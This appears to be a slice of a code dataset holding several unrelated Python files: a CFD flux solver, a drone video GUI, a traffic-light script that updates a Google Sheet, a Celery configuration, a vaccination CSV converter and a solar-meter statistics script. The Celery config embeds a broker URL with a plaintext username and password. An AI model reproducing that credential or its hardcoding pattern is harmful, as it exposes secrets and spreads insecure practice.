ConservativeState(self.inputs, nx=self.nx + 1, ny=1)\n\n # Set Flux Function. Flux Function must be included in __DEFINED_FLUX_FUNCTIONS__\n _flux_func = self.inputs.flux_function\n\n if _flux_func in __DEFINED_FLUX_FUNCTIONS__:\n\n # ROE Flux\n if _flux_func == 'Roe':\n self.flux_function_X = ROE_FLUX_X(self.inputs, self.inputs.nx)\n self.flux_function_Y = ROE_FLUX_X(self.inputs, self.inputs.ny)\n # HLLE Flux\n elif _flux_func == 'HLLE':\n self.flux_function_X = HLLE_FLUX_X(self.inputs)\n self.flux_function_Y = HLLE_FLUX_Y(self.inputs)\n # HLLL Flux\n elif _flux_func == 'HLLL':\n self.flux_function_X = HLLL_FLUX_X(self.inputs)\n self.flux_function_Y = HLLL_FLUX_Y(self.inputs)\n # None\n else:\n raise ValueError('MUSCLFiniteVolumeMethod: Flux function type not specified.')\n\n # Set slope limiter. Slope limiter must be included in __DEFINED_SLOPE_LIMITERS__\n _flux_limiter = self.inputs.limiter\n\n if _flux_limiter in __DEFINED_SLOPE_LIMITERS__:\n\n # Van Leer limiter\n if _flux_limiter == 'VanLeer':\n self.flux_limiter = limiters.VanLeer(self.inputs)\n # Van Albada limiter\n elif _flux_limiter == 'VanAlbada':\n self.flux_limiter = limiters.VanAlbada(self.inputs)\n # Venkatakrishnan\n elif _flux_limiter == 'Venkatakrishnan':\n self.flux_limiter = limiters.Venkatakrishnan(self.inputs)\n # BarthJespersen\n elif _flux_limiter == 'BarthJespersen':\n self.flux_limiter = limiters.BarthJespersen(self.inputs)\n # None\n else:\n raise ValueError('MUSCLFiniteVolumeMethod: Slope limiter type not specified.')\n\n # Set slope limiter. Slope limiter must be included in __DEFINED_SLOPE_LIMITERS__\n _gradient = self.inputs.gradient\n\n if _gradient in __DEFINED_GRADIENT_FUNCS__:\n\n # Van Leer limiter\n if _gradient == 'GreenGauss':\n self.gradient = Grads.GreenGauss(self.inputs)\n # None\n else:\n raise ValueError('MUSCLFiniteVolumeMethod: Slope limiter type not specified.')\n\n # ------------------------------------------------------------------------------------------------------------------\n # Reconstruction functions\n\n def reconstruct(self,\n refBLK\n ) -> [np.ndarray]:\n \"\"\"\n This method routes the state required for reconstruction to the correct implementation of the reconstruction.\n Current reconstruction methods are Primitive and Conservative.\n\n Parameters:\n - refBLK: Reference block to reconstruct\n\n Return:\n - stateE: Reconstructed state on east cell face\n - stateW: Reconstructed state on west cell face\n - stateN: Reconstructed state on north cell face\n - stateS: Reconstructed state on south cell face\n \"\"\"\n\n # Select correct reconstruction type and return left and right reconstructed conservative states\n\n # Primitive reconstruction\n if self.inputs.reconstruction_type == 'Primitive':\n return self.reconstruct_primitive(refBLK)\n\n # Conservative reconstruction (by default)\n else:\n return self.reconstruct_state(refBLK, refBLK.state.U,\n refBLK.ghost.E.state.U, refBLK.ghost.W.state.U,\n refBLK.ghost.N.state.U, refBLK.ghost.S.state.U)\n\n\n def reconstruct_primitive(self,\n refBLK,\n ) -> [np.ndarray]:\n \"\"\"\n Primitive reconstruction implementation. Simply convert the input ConservativeState into PrimitiveState and\n call the reconstruct_state implementation.\n\n Parameters:\n - U: Input ConservativeState for reconstruction.\n\n Return:\n - stateL: Left reconstructed conservative state\n - stateR: Right reconstructed conservative state\n \"\"\"\n\n _state = refBLK.state.to_primitive_vector()\n _state_E_ghost = refBLK.ghost.E.state.to_primitive_vector()\n _state_W_ghost = refBLK.ghost.W.state.to_primitive_vector()\n _state_N_ghost = refBLK.ghost.N.state.to_primitive_vector()\n _state_S_ghost = refBLK.ghost.S.state.to_primitive_vector()\n\n stateE, stateW, stateN, stateS = self.reconstruct_state(refBLK, _state,\n _state_E_ghost, _state_W_ghost,\n _state_N_ghost, _state_S_ghost)\n\n _state_E = ConservativeState(inputs=self.inputs, W_vector=stateE).U\n _state_W = ConservativeState(inputs=self.inputs, W_vector=stateW).U\n _state_N = ConservativeState(inputs=self.inputs, W_vector=stateN).U\n _state_S = ConservativeState(inputs=self.inputs, W_vector=stateS).U\n\n return _state_E, _state_W, _state_N, _state_S\n\n\n @abstractmethod\n def reconstruct_state(self,\n refBLK,\n state: np.ndarray,\n ghostE: np.ndarray,\n ghostW: np.ndarray,\n ghostN: np.ndarray,\n ghostS: np.ndarray\n ) -> [np.ndarray]:\n \"\"\"\n Implementation of the reconstruction method specialized to the Finite Volume Method described in the class.\n \"\"\"\n pass\n\n # ------------------------------------------------------------------------------------------------------------------\n # Flux evaluation and integration functions\n\n @abstractmethod\n def integrate_flux_E(self, refBLK):\n pass\n\n\n @abstractmethod\n def integrate_flux_W(self, refBLK):\n pass\n\n\n @abstractmethod\n def integrate_flux_N(self, refBLK):\n pass\n\n\n @abstractmethod\n def integrate_flux_S(self, refBLK):\n pass\n\n\n def dUdt(self, refBLK):\n \"\"\"\n Compute residuals used for marching the solution through time by integrating the fluxes on each cell face and\n applying the semi-discrete Godunov method:\n\n dUdt[i] = - (1/A[i]) * sum[over all faces] (F[face] * length[face])\n \"\"\"\n\n # Compute fluxes\n self.get_flux(refBLK)\n\n # Integrate fluxes\n fluxE = self.integrate_flux_E(refBLK)\n fluxW = self.integrate_flux_W(refBLK)\n fluxN = self.integrate_flux_N(refBLK)\n fluxS = self.integrate_flux_S(refBLK)\n\n return -(fluxE + fluxW + fluxN + fluxS) / refBLK.mesh.A\n\n\n def get_flux(self, refBLK):\n \"\"\"\n Compute the flux at each cell face by sweeping through rows and columns of the domain.\n \"\"\"\n\n # Compute x and y direction gradients\n self.gradient(refBLK)\n\n # Get reconstructed quadrature points\n stateE, stateW, stateN, stateS = self.reconstruct(refBLK)\n\n # --------------------------------------------------------------------------------------------------------------\n # Calculate x-direction Flux\n\n # Reset U vector holder sizes to ensure compatible with number of cells in x-direction\n self.UL.reset(shape=(1, self.nx + 1, 4))\n self.UR.reset(shape=(1, self.nx + 1, 4))\n\n # Copy all ghost cell values that will be used for the flux calculations\n _east_ghost = refBLK.ghost.E.col_copy(0)\n _west_ghost = refBLK.ghost.W.col_copy(-1)\n _north_ghost = refBLK.ghost.N.row_copy(0)\n _south_ghost = refBLK.ghost.S.row_copy(-1)\n\n # Rotate to allign with cell faces\n utils.rotate(refBLK.mesh.get_east_face_angle(), _east_ghost)\n utils.rotate(refBLK.mesh.get_west_face_angle(), _west_ghost)\n utils.rotate(refBLK.mesh.faceE.theta, stateE)\n utils.rotate(refBLK.mesh.faceW.theta - np.pi, stateW)\n\n # Iterate over all rows in block\n for row in range(self.ny):\n\n # Set vectors based on left and right states\n stateL = np.concatenate((_west_ghost[row:row+1, :, :],\n stateE[row:row+1, :, :]), axis=1)\n\n stateR = np.concatenate((stateW[row:row+1, :, :],\n _east_ghost[row:row+1, :, :]), axis=1)\n\n self.UL.from_conservative_state_vector(stateL)\n self.UR.from_conservative_state_vector(stateR)\n\n # Calculate face-normal-flux at each cell east-west interface\n flux_EW = self.flux_function_X.compute_flux(self.UL, self.UR)\n\n # Set east face flux\n self.Flux_E[row, :, :] = flux_EW[:, 1:, :]\n # Set west face flux\n self.Flux_W[row, :, :] = flux_EW[:, :-1, :]\n\n # Rotate flux back to local frame\n utils.unrotate(refBLK.mesh.faceE.theta, self.Flux_E)\n utils.unrotate(refBLK.mesh.faceW.theta - np.pi, self.Flux_W)\n\n # --------------------------------------------------------------------------------------------------------------\n # Calculate y-direction Flux\n\n # Reset U vector holder sizes to ensure compatible with number of cells in y-direction\n self.UL.reset(shape=(1, self.ny + 1, 4))\n self.UR.reset(shape=(1, self.ny + 1, 4))\n\n # Rotate to allign with cell faces\n utils.rotate(refBLK.mesh.get_north_face_angle(), _north_ghost)\n utils.rotate(refBLK.mesh.get_south_face_angle(), _south_ghost)\n utils.rotate(refBLK.mesh.faceN.theta, stateN)\n utils.rotate(refBLK.mesh.faceS.theta - np.pi, stateS)\n\n # Iterate over all columns in block\n for col in range(self.nx):\n\n # Set vectors based on left and right states\n stateL = np.concatenate((_south_ghost[:, col:col + 1, :],\n stateN[:, col:col + 1, :]), axis=0)\n\n stateR = np.concatenate((stateS[:, col:col + 1, :],\n _north_ghost[:, col:col + 1, :]), axis=0)\n\n self.UL.from_conservative_state_vector(stateL.transpose((1, 0, 2)))\n self.UR.from_conservative_state_vector(stateR.transpose((1, 0, 2)))\n\n # Calculate face-normal-flux at each cell east-west interface\n flux_NS = self.flux_function_Y.compute_flux(self.UL, self.UR).reshape(-1, 4)\n\n # Set east face flux\n self.Flux_N[:, col, :] = flux_NS[1:, :]\n # Set west face flux\n self.Flux_S[:, col, :] = flux_NS[:-1, :]\n\n # Rotate flux back to global frame\n utils.unrotate(refBLK.mesh.faceN.theta, self.Flux_N)\n utils.unrotate(refBLK.mesh.faceS.theta - np.pi, self.Flux_S)\n","sub_path":"pyHype/fvm/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":17929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"540325807","text":"import sys, app, time, cv2, datetime\nfrom pytz import timezone\nfrom PyQt5 import QtCore\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom threading import Thread\n\nclass GUI:\n def __init__(self):\n self.app = QApplication(sys.argv)\n self.window = QWidget()\n self.layout = QVBoxLayout(self.window)\n self.sub_layout = QHBoxLayout(self.window)\n self.window.setWindowTitle('Remote Drone')\n self.window.setGeometry(0, 0, 640, 480)\n \n # Label that displays the video feed\n self.video_label = QLabel()\n self.pixmap = QPixmap('video_blank.png')\n self.video_label.setPixmap(self.pixmap)\n \n # Button to take a picture\n self.button_capture_image = QPushButton('Take Picture')\n self.button_capture_image.clicked.connect(self.capture_image)\n\n self.layout.addWidget(self.video_label)\n self.layout.addWidget(self.button_capture_image)\n self.window.setLayout(self.layout)\n \n self.drone = None\n self.output_img = None\n\n self.layout.addLayout(self.sub_layout)\n self.label = QLabel('Speed: 0')\n self.label_1 = QLabel('Battery: 78')\n self.label_2 = QLabel('Temperature: 88')\n self.label.setAlignment(QtCore.Qt.AlignCenter)\n self.label_1.setAlignment(Qt.AlignCenter)\n self.label_2.setAlignment(Qt.AlignCenter)\n self.sub_layout.addWidget(self.label)\n self.sub_layout.addWidget(self.label_1)\n self.sub_layout.addWidget(self.label_2)\n \n\n def show_video_feed(self):\n # wait 10 seconds to make sure feed starts before capturing\n # otherwise it fails until app restarted\n print('sleeping for 5 sec')\n time.sleep(5)\n cap = cv2.VideoCapture('udp://0.0.0.0:11111?overrun_nonfatal=1&fifo_size=50000000', cv2.CAP_FFMPEG)\n cap.set(cv2.CAP_PROP_BUFFERSIZE, 0)\n if not cap.isOpened():\n print('cap not opened!!')\n exit(-1)\n\n while True:\n ret, frame = cap.read()\n\n if not ret:\n print('EMPTY FRAME')\n break\n\n # try to show frame 'image' in pixmap\n img = QImage(frame.data, frame.shape[1], frame.shape[0], QImage.Format_RGB888).rgbSwapped()\n # scale image smaller\n img.scaledToWidth(640, QtCore.Qt.SmoothTransformation)\n img.scaledToHeight(480, QtCore.Qt.SmoothTransformation)\n self.output_img = img.scaled(640, 480, QtCore.Qt.KeepAspectRatioByExpanding, QtCore.Qt.SmoothTransformation)\n self.video_label.setPixmap(QPixmap.fromImage(self.output_img))\n self.video_label.update()\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n cap.release()\n cv2.destroyAllWindows()\n\n\n def show(self):\n self.window.show()\n\n\n def capture_image(self):\n tz = timezone('US/Eastern')\n ts = datetime.datetime.now(tz)\n\n if self.output_img:\n self.output_img.save(f'{ts}.png')\n print('took a picture!')\n else:\n print('video capture is not open!')\n\n\n def set_self_drone(self, drone):\n self.drone = drone\n","sub_path":"models/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"602623137","text":"#coding=cp949\n\nprompt=\"\"\"\n1. 입력\n2. 종료\n 입력: \"\"\"\ningredint_list=[]\n\ndef input_ingredint():\n while True:\n input_list=input(\"안녕하세요. 원하시는 재료를 넣어주세요.: \")\n if input_list == '종료':\n return\n else:\n ingredint_list[:] += [input_list]\n\ndef make_sandwiches():\n print(\"샌드위치를 만듭니다.\")\n for i in ingredint_list[:]:\n print(f\"{i} 추가합니다.\")\n print(\"여기 주문하신 샌드위치 만들었습니다. 맛있게 드세요.\")\n\nwhile True:\n choice = int(input(prompt))\n if choice == 1:\n input_ingredint()\n make_sandwiches()\n break\n elif choice == 2:\n print(\"프로그램을 종료합니다.\")\n break\n else:\n print(\"잘못된 번호를 입력하셨습니다.\")\n continue\n\n","sub_path":"python_workspace/01_jump_to_python/4_input_output/3_file_io/q9.py","file_name":"q9.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"457706177","text":"import numpy as np\r\nimport time\r\nimport cv2 as cv\r\nfrom matplotlib import pyplot as plt\r\nimport random\r\nimport gspread\r\nfrom oauth2client.service_account import ServiceAccountCredentials\r\nfrom pprint import pprint\r\n\r\nscope = [\"https://spreadsheets.google.com/feeds\", 'https://www.googleapis.com/auth/spreadsheets',\r\n \"https://www.googleapis.com/auth/drive.file\", \"https://www.googleapis.com/auth/drive\"]\r\n\r\ncreds = ServiceAccountCredentials.from_json_keyfile_name(\"client_secret.json\", scope)\r\n\r\nclient = gspread.authorize(creds)\r\n\r\nsheet = client.open(\"MP6\").sheet1 # Open the spreadhseet\r\n\r\nwhile (1):\r\n\r\n ####-----------North\r\n p = 7\r\n sheet.update_cell(1, 2, 0)\r\n sheet.update_cell(3, 3, 20) # update non open corridors as open time =20\r\n sheet.update_cell(4, 3, 20)\r\n sheet.update_cell(5, 3, 20)\r\n edge = cv.imread('NRef.png', 0)\r\n now = sum(sum(edge))\r\n print(now)\r\n\r\n i = random.choice([1, 2, 3])\r\n print(i)\r\n j = str(i)\r\n file = 'North/NStage' + j + '.png'\r\n print(file)\r\n img1 = cv.imread(file, 0)\r\n edges1 = cv.Canny(img1, 150, 250)\r\n now1 = sum(sum(edges1))\r\n\r\n sim = (now / now1) * 100\r\n print(sim)\r\n\r\n if (sim > 37):\r\n nt = 20\r\n elif (sim > 34):\r\n nt = 40\r\n else:\r\n nt = 30\r\n\r\n sheet.update_cell(p, 2, 100 - sim)\r\n while nt > 0:\r\n sheet.update_cell(p, 3, nt)\r\n time.sleep(3)\r\n nt = nt - 3\r\n\r\n ####-----------West\r\n p = p + 1\r\n sheet.update_cell(1, 2, 1)\r\n sheet.update_cell(2, 3, 20) # update non open corridors as open time =20\r\n sheet.update_cell(4, 3, 20)\r\n sheet.update_cell(5, 3, 20)\r\n edge = cv.imread('WRef.jpg', 0)\r\n now = sum(sum(edge))\r\n print(now)\r\n\r\n i = random.choice([1, 2, 3])\r\n print(i)\r\n\r\n j = str(i)\r\n file = 'West/WStage' + j + '.jpg'\r\n print(file)\r\n img1 = cv.imread(file, 0)\r\n edges1 = cv.Canny(img1, 150, 250)\r\n now1 = sum(sum(edges1))\r\n\r\n sim = (now / now1) * 100\r\n print(sim)\r\n\r\n if (sim > 58):\r\n wt = 40\r\n elif (sim > 52):\r\n wt = 20\r\n else:\r\n wt = 30\r\n\r\n sheet.update_cell(p, 2, 100 - sim)\r\n while wt > 0:\r\n sheet.update_cell(p, 3, wt)\r\n time.sleep(3)\r\n wt = wt - 3\r\n\r\n ####-----------South\r\n p = p + 1\r\n sheet.update_cell(1, 2, 2)\r\n sheet.update_cell(2, 3, 20) # update non open corridors as open time =20\r\n sheet.update_cell(3, 3, 20)\r\n sheet.update_cell(5, 3, 20)\r\n edge = cv.imread('SRef.jpg', 0)\r\n now = sum(sum(edge))\r\n print(now)\r\n\r\n i = random.choice([1, 2, 3])\r\n print(i)\r\n j = str(i)\r\n file = 'South/SStage' + j + '.jpg'\r\n print(file)\r\n img1 = cv.imread(file, 0)\r\n edges1 = cv.Canny(img1, 150, 250)\r\n now1 = sum(sum(edges1))\r\n\r\n sim = (now / now1) * 100\r\n print(sim)\r\n\r\n if (sim > 15):\r\n st = 20\r\n elif (sim > 14.5):\r\n st = 40\r\n else:\r\n st = 30\r\n\r\n sheet.update_cell(p, 2, 100 - sim)\r\n while st > 0:\r\n sheet.update_cell(p, 3, st)\r\n time.sleep(3)\r\n st = st - 3\r\n\r\n ####-----------East\r\n p = p + 1\r\n sheet.update_cell(1, 2, 3)\r\n sheet.update_cell(2, 3, 20) # update non open corridors as open time =20\r\n sheet.update_cell(3, 3, 20)\r\n sheet.update_cell(4, 3, 20)\r\n edge = cv.imread('ERef.jpg', 0)\r\n now = sum(sum(edge))\r\n print(now)\r\n\r\n i = random.choice([1, 2, 3])\r\n print(i)\r\n j = str(i)\r\n file = 'East/EStage' + j + '.jpg'\r\n print(file)\r\n img1 = cv.imread(file, 0)\r\n edges1 = cv.Canny(img1, 150, 250)\r\n now1 = sum(sum(edges1))\r\n\r\n sim = (now / now1) * 100\r\n print(sim)\r\n\r\n if (sim > 18.9):\r\n et = 30\r\n elif (sim > 18.4):\r\n et = 40\r\n else:\r\n et = 20\r\n\r\n sheet.update_cell(p, 2, 100 - sim)\r\n while et > 0:\r\n sheet.update_cell(p, 3, et)\r\n time.sleep(3)\r\n et = et - 3\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"GLOSA/Sys@Int2.py","file_name":"Sys@Int2.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"273817275","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nThis module provides CFMM with the configuration required to use Celery. \n\"\"\"\n\nfrom celery.schedules import crontab\nfrom kombu import Exchange, Queue\n\nclass CeleryConfig(object):\n \"\"\"\n The default CFMM's configuration of Celery.\n \"\"\"\n\n # Timezone\n CELERY_ENABLE_UTC = True\n\n # Broker\n exchange_cfmm = Exchange(\"cfmm\", type=\"direct\")\n\n BROKER_CONNECTION_MAX_RETRIES = 10\n BROKER_CONNECTION_RETRY = True\n BROKER_CONNECTION_TIMEOUT = 3\n BROKER_URL = \"amqp://jascha:ruBwYrCM0BvPi300U1L9xocb@localhost:5672/cfmm\" # RabbitMQ\n BROKER_USE_SSL = False\n CELERY_ACCEPT_CONTENT = ['json', 'pickle']\n CELERY_ACKS_LATE = True\n CELERY_CREATE_MISSING_QUEUES = False\n CELERY_DEFAULT_EXCHANGE = exchange_cfmm\n CELERY_DEFAULT_EXCHANGE_TYPE = \"direct\"\n CELERY_DEFAULT_ROUTING_KEY = \"bitbucket\"\n CELERY_DEFAULT_QUEUE = \"bitbucket\"\n CELERY_INCLUDE = [\n \"cfmm.base\"\n ]\n CELERY_QUEUES = (\n Queue(\"bitbucket\", exchange_cfmm, routing_key=\"bitbucket\"),\n Queue(\"googlebooks\", exchange_cfmm, routing_key=\"cfmm.base\"),\n )\n CELERY_TASK_PUBLISH_RETRY = True\n CELERY_TASK_SERIALIZER = \"pickle\"\n CELERYD_USER=\"jascha\"\n CELERYD_GROUP=\"jascha\"\n CELERYD_TASK_SOFT_TIME_LIMIT = 300\n CELERYD_TASK_TIME_LIMIT = 600\n CELERY_TRACK_STARTED = True\n\n # Results\n CELERY_RESULT_BACKEND = \"redis://localhost:6379/0\" # Redis\n CELERY_RESULT_EXCHANGE = \"cfmm_results\"\n CELERY_RESULT_EXCHANGE_TYPE = \"direct\"\n CELERY_RESULT_PERSISTENT = False\n CELERY_RESULT_SERIALIZER = \"pickle\"\n CELERY_TASK_RESULT_EXPIRES = 600 # 10 minutes","sub_path":"cfmm/celeryapp/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"89528786","text":"import sys,csv\n\n# Convert loose format vaccination data csv from MSOA tab of weekly vaccination data from https://www.england.nhs.uk/statistics/statistical-work-areas/covid-19-vaccinations/ to a simple standard csv\n\n# \"Under xx\", \"xx-yy\", \"xx+\"\ndef parseagerange(x):\n if x[:6]==\"Under \": return \"0-%d\"%int(x[6:])\n if '-' in x: y=x.split('-');return \"%d-%d\"%(int(y[0]),int(y[1])+1)\n if x[-1:]=='+': return \"%d-150\"%int(x[:-1])\n return None\n\ndef flattennumber(x): return int(x.replace(',',''))\n\nreader=csv.reader(sys.stdin)\nwriter=csv.writer(sys.stdout)\nstart=False\noutrows=[]\nfor row in reader:\n if 'LTLA Code' in row: headings=row\n numageranges=sum(x[:6]=='Under ' for x in row)\n assert numageranges<3\n if numageranges>0:\n for (i,x) in enumerate(row):\n while i>=len(headings): headings.append('')\n if row[i]!='': headings[i]=row[i]\n cols=[]\n outputheadings=[]\n n=0\n for (i,x) in enumerate(headings):\n if x=='LTLA Code': outputheadings.append(x);lcol=i;continue\n if x=='MSOA Code': outputheadings.append(x);mcol=i;continue\n a=parseagerange(x)\n if a!=None:\n if a[:2]=='0-': n+=1\n prefix=('D*' if numageranges==1 else 'D%d'%n)\n outputheadings.append(prefix+'.'+a)\n cols.append(i)\n writer.writerow(outputheadings)\n start=True\n continue\n if start and row[lcol][:1]=='E':\n outrows.append([row[lcol],row[mcol]]+[flattennumber(row[i]) for i in cols])\noutrows.sort()\nfor row in outrows:\n writer.writerow(row)\n","sub_path":"VOCgrowth/convvaxdata_msoa.py","file_name":"convvaxdata_msoa.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"397682495","text":"import sys\nimport struct\nimport binascii\n\nclass Counter():\n\tTOTAL_LINES = 0x77\n\tCODE_FILEPOINTER = None\n\n\tdef init(self):\n\t\tf = open(\"./code\", \"rb\")\n\t\tself.CODE_FILEPOINTER = f.read()\n\t\tself.CODE_FILEPOINTER = self.CODE_FILEPOINTER[4:]\n\t\t\n\tdef toDWord(self, code_buffer):\n\t\treturn struct.unpack(\">>>>> #\r\n# #\r\n# the name of the program is entered in the command line with #\r\n# the data file to be used. A typical invocation of #\r\n# the program would be: #\r\n# python3 solar.py generation.dat #\r\n# #\r\n# #\r\n# #\r\n# #\r\n# #\r\n# AUTHOR #\r\n# Registration number 0000000 # \r\n# I hereby certify that this program is entirely my own work. #\r\n###########################################################################\r\n\r\n\r\n\r\n\"\"\"#####################################################################################\"\"\"\r\n\"\"\" PART 0 \"\"\"\r\n\"\"\" IMPORTING MODULS \"\"\"\r\n\"\"\" & \"\"\"\r\n\"\"\" READING DATA FROM FILE \"\"\"\r\n\"\"\"#####################################################################################\"\"\"\r\n# In this step modules needed were imported.\r\n# math = in standard deviation function, for square root calculation\r\n# pylab = for drawing graphics\r\n# sys = for reading the data file at the command line\r\nimport math \r\nimport pylab\r\nimport sys\r\n\r\n# In this part, program reads a file which is given on the command line (for example: generation.dat)\r\n# If you do not get the data file, produce an error message about it.\r\n# it reads this file and assign the data in an array (all_data)\r\n\r\n\r\nall_data=[]\r\ntry:\r\n with open(sys.argv[1], \"r\") as f:\r\n all_data=f.readlines()\r\nexcept:\r\n print (\" could not read any imput\")\r\n exit(1)\r\n\r\n\r\n\r\n\r\n\"\"\"#####################################################################################\"\"\"\r\n\"\"\" PART I \"\"\"\r\n\"\"\" FUNCTIONS \"\"\"\r\n\"\"\"#####################################################################################\"\"\"\r\n\r\n# this function return an ordinal number when it take a number.\r\n# for example = when it takes 101, it returns with 101st\r\n\r\ndef ordinal_number(x):\r\n x = str(x)\r\n or_num = \"\"\r\n if x[-1] == \"1\":\r\n or_num = \"st\"\r\n elif x[-1] == \"2\":\r\n or_num = \"nd\"\r\n elif x[-1] == \"3\":\r\n or_num = \"rd\"\r\n else:\r\n or_num = \"th\"\r\n or_num = x + or_num\r\n return or_num\r\n\r\n \r\n# this function is for sorting arrays.\r\n# When you sent two array, the function sorts them by first one\r\n# Insertion sort algortim is used\r\ndef sorting (array_1,array_2):\r\n \r\n for i in range(0, len(array_1) - 1):\r\n for j in range (i + 1 , len(array_1)):\r\n if array_1[i] > array_1[j]:\r\n array_1[i] , array_1[j] = array_1[j] , array_1[i]\r\n array_2[i] , array_2[j] = array_2[j] , array_2[i]\r\n return array_1 , array_2\r\n\r\n\r\n# This function is for calculate standard deviation.\r\n# It works with an array and return with a float number (sd_con) .\r\ndef st_dev (sd_vals):\r\n \r\n sd_ave = mean(sd_vals)\r\n lng = len(sd_vals)\r\n total = 0\r\n \r\n for i in range (0,lng):\r\n total = total + (sd_ave - sd_vals[i]) ** 2\r\n \r\n sd_con = math.sqrt( 1 / (lng - 1) * total )\r\n return sd_con\r\n\r\n\r\n# This function is for calculate mean.\r\n# It works with an array and return with a float number.\r\ndef mean (vals):\r\n total = 0\r\n lng=len(vals)\r\n for i in range (0,lng):\r\n total = total + vals[i]\r\n average = total / lng\r\n return average\r\n\r\n\r\n\"\"\"#####################################################################################\"\"\"\r\n\"\"\" PART I \"\"\"\r\n\"\"\" In this section, the data in the data file is read and the data is classified. \"\"\"\r\n\"\"\" \"\"\"\r\n\"\"\"#####################################################################################\"\"\"\r\n\r\n# variables to be used throughout the program are defined.\r\nexplanation = [] # this array contains explanations \r\ndays_array = [] # this array contains days\r\nvalue_f_meter = [] # this array contains the reading of the generation meter at the end of that day\r\namount_per_day = [] # this array contains the amount of electricity generated in a day\r\nnumbers = \"1234567890\" # this array contains numbers between 0-9, it is used to determine if a variable is a number.\r\n\r\n\r\n# In this part, firstly check the data come from the file is an explanation or a numerical value.\r\n# If it is a numerical value, the program separates it two parts:\r\n# 1- Day Number ( array name = days_array )\r\n# 2- The reading of the generation meter ( array name = value_f_meter )\r\n# These two data is held in the arrays with same index number.\r\nfor i in all_data:\r\n if i[0] not in numbers :\r\n explanation += [i]\r\n else:\r\n space = i.find(\" \")\r\n days_array += [i[0 :space]]\r\n other = (i[space + 1:])\r\n space = other.find(\" \")\r\n if other == -1:\r\n value_f_meter += [other]\r\n else:\r\n value_f_meter += [other[0:space]]\r\n\r\n# In this part the day numbers (days_array) were converted to integer,\r\n# the reading of the generation meter at the end of that day (value_f_meter) was converted to float\r\nfor i in range (0,len(days_array)) :\r\n try:\r\n days_array[i] = int(days_array[i])\r\n value_f_meter[i] = float(value_f_meter[i])\r\n except:\r\n print (\"There is a problem in your data file\")\r\n exit(1)\r\n \r\n \r\n\"\"\"#####################################################################################\"\"\"\r\n\"\"\" PART II \"\"\"\r\n\"\"\" missing days are calculated \"\"\"\r\n\"\"\" the amount of electricity generated in every day is calculated \"\"\"\r\n\"\"\"#####################################################################################\"\"\"\r\n\r\n# In this step, missing days are calculated\r\n# when the days are sorted, anomalies are detected and the total value is distributed to the lost days.\r\n# lost days and lost values are added to the end of the relevant series.\r\nfor i in range (0,len(days_array) - 1):\r\n if days_array[i + 1]-days_array[i] > 1:\r\n difference1 = (value_f_meter[i + 1]- value_f_meter[i]) / (days_array[i + 1] - days_array[i])\r\n difference = difference1\r\n for j in range (days_array[i] + 1,days_array[i + 1]):\r\n days_array += [j]\r\n value_f_meter += [value_f_meter[i] + difference]\r\n difference = difference + difference1\r\n\r\n#using the sorting function, the lost days and values were settled in their places. \r\ndays_array,value_f_meter = sorting(days_array,value_f_meter)\r\n\r\n#the amount of electricity generated in every day is calculated\r\n#and hold in an array (amount_per_day)\r\namount_per_day += [0]\r\nfor i in range (0,len(days_array) -1 ):\r\n amount_per_day += [value_f_meter[i + 1] - value_f_meter[i]]\r\n\r\n\r\n\r\n\"\"\"#####################################################################################\"\"\"\r\n\"\"\" PART III \"\"\"\r\n\"\"\" the requested outputs are calculated and printed \"\"\"\r\n\"\"\"#####################################################################################\"\"\"\r\n\r\n# mean function is used to calculate the average.\r\nmean_per_day = mean(amount_per_day)\r\n# The mean amount generated per day is printed\r\nprint((\"The mean amount generated per day = %.2f\" %(mean_per_day)))\r\n\r\n\r\n# in this section, for finding The maximum amount, max() is used.\r\n# this function search maximum value in the amount of electricity generated in every day (amount_per_day)\r\n# after finding maximum value, checked which days are and is the value repeated.\r\nn = -1\r\nstring_char = \"\"\r\nwhile True:\r\n try:\r\n n=days_array[amount_per_day.index(max(amount_per_day), n + 1)]\r\n ord_num = ordinal_number(str(n))\r\n string_char = string_char + ord_num + \" day | \"\r\n except:break\r\n\r\n \r\n# The maximum amount is printed\r\nprint(\"The maximum amount = %.2f\" %(amount_per_day[n]))\r\n\r\n# The maximum amount observed day(s) is printed\r\nprint( \"The maximum amount observed day(s) = %s\" %(string_char))\r\n\r\n\r\n# in this section, for finding The maximum amount, max() is used.\r\n# this function search maximum value in the amount of electricity generated in every day (amount_per_day)\r\n# after finding maximum value, checked which days are and is the value repeated.\r\nn=0\r\nstring_char = \"\"\r\nwhile True:\r\n try:\r\n n=days_array[amount_per_day.index(min(amount_per_day), n + 1)]\r\n ord_num = ordinal_number(str(n))\r\n string_char = string_char + ord_num + \" day | \"\r\n except:break\r\n\r\n# The minimum amount is printed\r\nprint(\"The minimum amount = %.2f \" %(amount_per_day[n]))\r\n# The minimum amount observed day(s) is printed\r\nprint( (\"The minimum amount observed day(s) = %s\" % (string_char)))\r\n\r\n\r\n\r\n\"\"\"#####################################################################################\"\"\"\r\n\"\"\" PART IV \"\"\"\r\n\"\"\" spliting the readings into 28-day chunks \"\"\"\r\n\"\"\" calculate the mean and standard deviation for each chunk \"\"\"\r\n\"\"\" graphicization \"\"\"\r\n\"\"\"#####################################################################################\"\"\"\r\n\r\n# variables to be used chunking proces are defined.\r\na28_days_chunk = [] # a temporary variable to divide the days into 28-day-chunks\r\nmean_of_chunks = [] # this array contains every 28-day-chunks means.\r\nsd_of_chunks = [] # this array contains every 28-day-chunks standard deviation.\r\n\r\n\r\n# in this step, the values (days 